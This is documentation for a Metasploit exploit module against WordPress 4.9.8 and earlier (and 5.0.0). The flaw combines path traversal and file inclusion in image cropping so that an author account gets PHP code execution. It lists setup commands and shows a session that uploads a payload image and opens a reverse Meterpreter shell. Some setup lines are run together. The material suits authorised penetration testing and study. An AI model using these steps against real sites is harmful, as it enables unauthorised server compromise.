documentation/modules/exploit/multi/http/wp_crop_rce.md
On WordPress versions 5.0.0 and <= 4.9.8 it is possible to gain arbitrary code execution via a core vulnerability combining a Path Traversal and a Local File Inclusion. An attacker who gains access to an account with at least author privileges on the target can execute PHP code on the remote server.
_wp_attached_file entry from meta_input $_POST array to specify an arbitrary pathcrop-image Wordpress function_wp_page_template value to the cropped image. The post will include() our image containing PHP code.When visiting the post created by the attacker it is possible to obtain code execudion.
More details can be found on RIPS Technology Blog.
Confirm that functionality works:
msfconsoleuse exploit/multi/http/wp_crop_rceRHOSTUSERNAME and PASSWORDLHOST and LPORTrunThe name of the theme Wordpress is using. Used if the theme cannot be auto-detected.
msf > use exploit/multi/http/wp_crop_rce
msf exploit(multi/http/wp_crop_rce) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf exploit(multi/http/wp_crop_rce) > set username author
username => author
msf exploit(multi/http/wp_crop_rce) > set password author
password => author
msf exploit(multi/http/wp_crop_rce) > run
[*] Started reverse TCP handler on 127.0.0.1:4444
[*] Authenticating with WordPress using author:author...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Checking crop library
[*] Uploading payload
[+] Image uploaded
[*] Uploading payload
[+] Image uploaded
[*] Including into theme
[*] Sending stage (38247 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:36568) at 2019-03-19 11:33:27 -0400
meterpreter > sysinfo
Computer : ubuntu
OS : Linux ubuntu 4.15.0-46-generic #49-Ubuntu SMP Wed Feb 6 09:33:07 UTC 2019 x86_64
Meterpreter : php/linux